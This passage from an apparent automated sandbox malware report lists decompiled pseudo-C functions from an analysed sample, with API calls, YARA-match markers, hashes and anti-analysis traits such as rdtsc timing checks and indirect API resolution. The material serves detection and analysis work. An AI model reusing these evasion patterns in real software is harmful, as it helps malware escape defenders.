                                                • Associated: 00000005.00000002.462274748.0000000000AB0000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                                • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0095FFB4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.462096989.0000000000950000.00000040.00000001.sdmp, Offset: 00940000, based on PE: true
                                                • Associated: 00000005.00000002.462086313.0000000000940000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462196280.0000000000A30000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462209254.0000000000A40000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462218698.0000000000A44000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462224641.0000000000A47000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462233009.0000000000A50000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462274748.0000000000AB0000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                                • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00409AB0, Relevance: .1, Instructions: 92COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 93%
                                                			E00409AB0(intOrPtr* _a4) {
				intOrPtr _v8;
				char _v24;
				char _v284;
				char _v804;
				char _v840;
				void* _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t39;
				void* _t50;
				intOrPtr* _t52;
				void* _t53;
				void* _t54;
				void* _t55;
				void* _t56;

				_t52 = _a4;
				_t39 = 0; // executed
				_t24 = E00407EA0(_t52,  &_v24); // executed
				_t54 = _t53 + 8;
				if(_t24 != 0) {
					E004080B0( &_v24,  &_v840);
					_t55 = _t54 + 8;
					do {
						E0041BE10( &_v284, 0x104);
						E0041C480( &_v284,  &_v804);
						_t56 = _t55 + 0x10;
						_t50 = 0x4f;
						while(1) {
							_t31 = E00414DF0(E00414D90(_t52, _t50),  &_v284);
							_t56 = _t56 + 0x10;
							if(_t31 != 0) {
								break;
							}
							_t50 = _t50 + 1;
							if(_t50 <= 0x62) {
								continue;
							} else {
							}
							goto L8;
						}
						_t9 = _t52 + 0x14; // 0xffffe045
						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
						_t39 = 1;
						L8:
						_t33 = E004080E0( &_v24,  &_v840);
						_t55 = _t56 + 8;
					} while (_t33 != 0 && _t39 == 0);
					_t34 = E00408160(_t52,  &_v24); // executed
					if(_t39 == 0) {
						asm("rdtsc");
						asm("rdtsc");
						_v8 = _t34 - 0 + _t34;
						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
					}
					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
					_t20 = _t52 + 0x31; // 0x5608758b
					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
					return 1;
				} else {
					return _t24;
				}
			}



















                                                0x00409abb
                                                0x00409ac3
                                                0x00409ac5
                                                0x00409aca
                                                0x00409acf
                                                0x00409ae2
                                                0x00409ae7
                                                0x00409af0
                                                0x00409afc
                                                0x00409b0f
                                                0x00409b14
                                                0x00409b17
                                                0x00409b20
                                                0x00409b32
                                                0x00409b37
                                                0x00409b3c
                                                0x00000000
                                                0x00000000
                                                0x00409b3e
                                                0x00409b42
                                                0x00000000
                                                0x00000000
                                                0x00409b44
                                                0x00000000
                                                0x00409b42
                                                0x00409b46
                                                0x00409b49
                                                0x00409b4f
                                                0x00409b51
                                                0x00409b5c
                                                0x00409b61
                                                0x00409b64
                                                0x00409b71
                                                0x00409b7c
                                                0x00409b7e
                                                0x00409b84
                                                0x00409b88
                                                0x00409b8b
                                                0x00409b8b
                                                0x00409b92
                                                0x00409b95
                                                0x00409b9a
                                                0x00409ba7
                                                0x00409ad6
                                                0x00409ad6
                                                0x00409ad6

                                                Memory Dump Source
                                                • Source File: 00000005.00000002.461861564.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bf70d19deb8b7dbf65a1c14f2d3141162741e3067e6603a799ea80fa30cdc1c2
                                                • Instruction ID: 0b46cc9625fd597f0f1293e0fe630cc8c1f9f1e3f005c30533d49d025d22dd75
                                                • Opcode Fuzzy Hash: bf70d19deb8b7dbf65a1c14f2d3141162741e3067e6603a799ea80fa30cdc1c2
                                                • Instruction Fuzzy Hash: 97210AB2D4020857CB25D674AD52BFF73BCAB54314F04007FE949A3182F638BE498BA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0041A630, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RtlAllocateHeap.NTDLL(6EA,?,00414CAF,00414CAF,?,00414536,?,?,?,?,?,00000000,00409CF3,?), ref: 0041A65D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.461861564.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateHeap
                                                • String ID: 6EA
                                                • API String ID: 1279760036-1400015478
                                                • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                • Instruction ID: b63900df46c74d48569035b2bcc9be016157083d4ef88d1b541c797289a4eec1
                                                • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                • Instruction Fuzzy Hash: 46E012B1200208ABDB14EF99CC41EA777ACEF88664F158559BA085B242C630F9118AB0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0041A5F7, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 21memoryCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 27%
                                                			E0041A5F7(void* __eax, void* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8, char _a12, long _a16, long _a20) {
				void* _t19;
				void* _t33;
				void* _t34;
				intOrPtr* _t36;
				void* _t38;

				if(__ecx >  *__edx) {
					 *((intOrPtr*)(__ecx - 0x73)) =  *((intOrPtr*)(__ecx - 0x73)) + __edx;
					 *((intOrPtr*)(_t34 + 0x50)) =  *((intOrPtr*)(_t34 + 0x50)) + __edx;
					E0041AF60(_t33);
					_t12 =  &_a12; // 0x414536
					_t19 = RtlAllocateHeap( *_t12, _a16, _a20); // executed
					return _t19;
				} else {
					_t21 = _a4;
					_t3 = _t21 + 0xc6c; // 0xc6e
					_t36 = _t3;
					E0041AF60(_t33, _a4, _t36,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x33);
					return  *((intOrPtr*)( *_t36))(_a8, _a12, _t34, _t38);
				}
			}








                                                0x0041a5f9
                                                0x0041a63d
                                                0x0041a644
                                                0x0041a647
                                                0x0041a652
                                                0x0041a65d
                                                0x0041a661
                                                0x0041a5fb
                                                0x0041a603
                                                0x0041a60f
                                                0x0041a60f
                                                0x0041a617
                                                0x0041a62d
                                                0x0041a62d

                                                APIs
                                                • RtlAllocateHeap.NTDLL(6EA,?,00414CAF,00414CAF,?,00414536,?,?,?,?,?,00000000,00409CF3,?), ref: 0041A65D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.461861564.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateHeap
                                                • String ID: 6EA
                                                • API String ID: 1279760036-1400015478
                                                • Opcode ID: d7731d8716a9909aaebbcc61393e2c5dcb5147951310e5446d50a0b4bd4e0840
                                                • Instruction ID: f8b0307e263f0a20d44079788cd30cb9ea9ec63190e6cfd16d2e7c5213453682
                                                • Opcode Fuzzy Hash: d7731d8716a9909aaebbcc61393e2c5dcb5147951310e5446d50a0b4bd4e0840
                                                • Instruction Fuzzy Hash: 63E026F51082C45FD710DF34A8804C77BA4AE85308768818DF88803603C120C81286A1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00408310, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 82%
                                                			E00408310(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				intOrPtr* _t25;
				void* _t26;
				void* _t30;

				_t30 = __eflags;
				_v68 = 0;
				E0041BE60( &_v67, 0, 0x3f);
				E0041CA00( &_v68, 3);
				_t12 = E0040ACF0(_t30, _a4 + 0x1c,  &_v68); // executed
				_t13 = E00414E50(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t32 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t25(_t21, 0x8003, _t26 + (E0040A480(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}












                                                0x00408310
                                                0x0040831f
                                                0x00408323
                                                0x0040832e
                                                0x0040833e
                                                0x0040834e
                                                0x00408353
                                                0x0040835a
                                                0x0040835d
                                                0x0040836a
                                                0x0040836c
                                                0x0040836e
                                                0x0040838b
                                                0x0040838b
                                                0x00000000
                                                0x0040838d
                                                0x00408392

                                                APIs
                                                • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.461861564.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: MessagePostThread
                                                • String ID:
                                                • API String ID: 1836367815-0
                                                • Opcode ID: 2d1f258feb65caa57005a4ca8181d3a83820067681332b4e8454df4711668a76
                                                • Instruction ID: fe648ddaccc693dff6b318d6e20673cc1517f8ca6da234ac2c2ad493b9bfa733
                                                • Opcode Fuzzy Hash: 2d1f258feb65caa57005a4ca8181d3a83820067681332b4e8454df4711668a76
                                                • Instruction Fuzzy Hash: FF018431A8032C76E721A6959C43FFE776C5B40F54F05011AFF04BA1C2EAA8690546EA
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040ACE5, Relevance: 1.5, APIs: 1, Instructions: 38libraryloaderCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 58%
                                                			E0040ACE5(void* __eax, void* __ebx, void* __ecx, void* _a8) {
				void* _v4;
				void* _v8;
				void* _v12;
				void* _v536;
				void* _t15;

				_t15 = __eax;
				asm("stc");
				if (__ebx + 1 <= 0) goto L7;
			}








                                                0x0040ace5
                                                0x0040acee
                                                0x0040acef

                                                APIs
                                                • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD62
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.461861564.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: Load
                                                • String ID:
                                                • API String ID: 2234796835-0
                                                • Opcode ID: ac607fe8fadfd29998aeae0fc689f596357b97b0bf363d8ae678b1bbacd093b8
                                                • Instruction ID: 2939d7c89a7172a658210ab68ef3fead8153cd52e8a31b6efd872631f279e96f
                                                • Opcode Fuzzy Hash: ac607fe8fadfd29998aeae0fc689f596357b97b0bf363d8ae678b1bbacd093b8
                                                • Instruction Fuzzy Hash: 24F06875E4020DABDF10DB95DC82FD9B378AF48308F0081A6E91D9B681F630DA59CB92
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0041A7C2, Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 64%
                                                			E0041A7C2(signed int __eax, void* __ebx, void* __ecx, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t13;
				void* _t21;

				asm("les esi, [edx]");
				asm("lds esi, [0x769869b8]");
				 *(__ecx + 0x55197a7f) =  *(__ecx + 0x55197a7f) | __eax;
				_t10 = _a4;
				E0041AF60(_t21, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_t10 + 0xa18)), 0, 0x46);
				_t13 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t13;
			}





                                                0x0041a7c2
                                                0x0041a7c5
                                                0x0041a7cb
                                                0x0041a7d3
                                                0x0041a7ea
                                                0x0041a800
                                                0x0041a804

                                                APIs
                                                • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A800
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.461861564.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: LookupPrivilegeValue
                                                • String ID:
                                                • API String ID: 3899507212-0
                                                • Opcode ID: 5293b461ac1da1569b82276833f07d95cefbcf7da94b6f4b372471dededb407f
                                                • Instruction ID: 691f3f98cb7d57195190baae01592f46005a8642ef15458af35efcd506b53531
                                                • Opcode Fuzzy Hash: 5293b461ac1da1569b82276833f07d95cefbcf7da94b6f4b372471dededb407f
                                                • Instruction Fuzzy Hash: 64F0A0B2600218ABDB14DF44CC40ED73768EF49310F258154FD086B242C631ED16CBE1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0041A670, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E0041A670(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E0041AF60(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                0x0041a67f
                                                0x0041a687
                                                0x0041a69d
                                                0x0041a6a1

                                                APIs
                                                • RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A69D
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.461861564.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: FreeHeap
                                                • String ID:
                                                • API String ID: 3298025750-0
                                                • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                • Instruction ID: 086aab0bc8c344d6c60c9bbd5a0512cabfd8005857d16272e4a7e29987098a06
                                                • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                • Instruction Fuzzy Hash: C1E012B1200208ABDB18EF99CC49EA777ACEF88764F118559BA085B242C630E9108AB0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0041A7D0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E0041A7D0(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				E0041AF60(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                0x0041a7ea
                                                0x0041a800
                                                0x0041a804

                                                APIs
                                                • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A800
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.461861564.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: LookupPrivilegeValue
                                                • String ID:
                                                • API String ID: 3899507212-0
                                                • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                • Instruction ID: 3f9aab8e47c10174471559fee5d267dc63a882ce56825bdd12c8e63267ac542a
                                                • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                • Instruction Fuzzy Hash: 23E01AB12002086BDB10DF49CC85EE737ADEF88654F118155BA0C57241C934E8118BF5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0041A6B0, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E0041A6B0(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				E0041AF60(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}




                                                0x0041a6b3
                                                0x0041a6ca
                                                0x0041a6d8

                                                APIs
                                                • ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 0041A6D8
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.461861564.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: ExitProcess
                                                • String ID:
                                                • API String ID: 621844428-0
                                                • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                • Instruction ID: 671013aba82168957284564a3a9f05bc2528e3e40ec9789e05460755300894f7
                                                • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                • Instruction Fuzzy Hash: 68D017726002187BD620EB99CC85FD777ACDF48BA4F1580A9BA1C6B242C531BA108AE1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Non-executed Functions

                                                Function 009726F8, Relevance: .0, Instructions: 44COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.462096989.0000000000950000.00000040.00000001.sdmp, Offset: 00940000, based on PE: true
                                                • Associated: 00000005.00000002.462086313.0000000000940000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462196280.0000000000A30000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462209254.0000000000A40000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462218698.0000000000A44000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462224641.0000000000A47000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462233009.0000000000A50000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462274748.0000000000AB0000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
                                                • Instruction ID: 76f608394c17b2da61c0e60d7b396822e6560d31d6cc7678428f468fa45b9427
                                                • Opcode Fuzzy Hash: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
                                                • Instruction Fuzzy Hash: 4DF0C222338559EBDB4CEB189E5176A33D9EBD4300F54C479ED4DCB251E635FE408290
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 009610D0, Relevance: .0, Instructions: 6COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.462096989.0000000000950000.00000040.00000001.sdmp, Offset: 00940000, based on PE: true
                                                • Associated: 00000005.00000002.462086313.0000000000940000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462196280.0000000000A30000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462209254.0000000000A40000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462218698.0000000000A44000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462224641.0000000000A47000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462233009.0000000000A50000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462274748.0000000000AB0000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
                                                • Instruction ID: b97e0867cf63cce6a7bd091cca7d2f61d4937398616a74d9d7050cc2a0bd1794
                                                • Opcode Fuzzy Hash: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
                                                • Instruction Fuzzy Hash: E8B01272180540CBE3199718E906F5FB710FB90F00F00C93EA00781C50DA389D3CD446
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00960060, Relevance: .0, Instructions: 6COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.462096989.0000000000950000.00000040.00000001.sdmp, Offset: 00940000, based on PE: true
                                                • Associated: 00000005.00000002.462086313.0000000000940000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462196280.0000000000A30000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462209254.0000000000A40000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462218698.0000000000A44000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462224641.0000000000A47000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462233009.0000000000A50000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462274748.0000000000AB0000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
                                                • Instruction ID: 5a023e870da9c1ddb48dfa425d4b1b106951aaa9a6b60f468992a3f00291b547
                                                • Opcode Fuzzy Hash: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
                                                • Instruction Fuzzy Hash: 5CB012B2100580C7E30D9714DD06B4B7210FB80F00F00893AA10B81861DB7C9A2CD45E
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 009601D4, Relevance: .0, Instructions: 6COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.462096989.0000000000950000.00000040.00000001.sdmp, Offset: 00940000, based on PE: true
                                                • Associated: 00000005.00000002.462086313.0000000000940000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462196280.0000000000A30000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462209254.0000000000A40000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462218698.0000000000A44000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462224641.0000000000A47000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462233009.0000000000A50000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462274748.0000000000AB0000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8778145c82cc07ced6a03fc17a8dcea4f431f55768a4b0417211ed07bf4591cb
                                                • Instruction ID: 018f436d7687ff9142db90ebed9d2f0c0dfd000868ccafab48d689f3c6447ef1
                                                • Opcode Fuzzy Hash: 8778145c82cc07ced6a03fc17a8dcea4f431f55768a4b0417211ed07bf4591cb
                                                • Instruction Fuzzy Hash: B2B01272100940C7E359A714ED46B4B7210FB80F01F00C93BA01B81851DB38AA3CDD96
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0096010C, Relevance: .0, Instructions: 6COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.462096989.0000000000950000.00000040.00000001.sdmp, Offset: 00940000, based on PE: true
                                                • Associated: 00000005.00000002.462086313.0000000000940000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462196280.0000000000A30000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462209254.0000000000A40000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462218698.0000000000A44000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462224641.0000000000A47000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462233009.0000000000A50000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462274748.0000000000AB0000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
                                                • Instruction ID: 6f78205b53d22ab4e8c81d7e3ead40d6172b524c4c965a7ad5e52c730ffb8076
                                                • Opcode Fuzzy Hash: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
                                                • Instruction Fuzzy Hash: B8B01273104D40C7E3099714DD16F4FB310FB90F02F00893EA00B81850DA38A92CC846
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00961148, Relevance: .0, Instructions: 6COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.462096989.0000000000950000.00000040.00000001.sdmp, Offset: 00940000, based on PE: true
                                                • Associated: 00000005.00000002.462086313.0000000000940000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462196280.0000000000A30000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462209254.0000000000A40000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462218698.0000000000A44000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462224641.0000000000A47000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462233009.0000000000A50000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462274748.0000000000AB0000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a1a4eb0b16b3dbbf7110758f456c9aa6f179838dd1f90225a28a8369ad29a59d
                                                • Instruction ID: 165250f8074bc0ef9cdc504fa449021ea13c8322197c03fc884fef66fc1cad38
                                                • Opcode Fuzzy Hash: a1a4eb0b16b3dbbf7110758f456c9aa6f179838dd1f90225a28a8369ad29a59d
                                                • Instruction Fuzzy Hash: 23B01272140580C7E31D9718D906B5B7610FB80F00F008D3AA04781CA1DBB89A2CE44A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 009607AC, Relevance: .0, Instructions: 6COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.462096989.0000000000950000.00000040.00000001.sdmp, Offset: 00940000, based on PE: true
                                                • Associated: 00000005.00000002.462086313.0000000000940000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462196280.0000000000A30000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462209254.0000000000A40000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462218698.0000000000A44000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462224641.0000000000A47000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462233009.0000000000A50000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462274748.0000000000AB0000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                • Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
                                                • Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                • Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0095F8CC, Relevance: .0, Instructions: 6COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.462096989.0000000000950000.00000040.00000001.sdmp, Offset: 00940000, based on PE: true
                                                • Associated: 00000005.00000002.462086313.0000000000940000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462196280.0000000000A30000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462209254.0000000000A40000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462218698.0000000000A44000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462224641.0000000000A47000.00000040.00000001.sdmp Download File
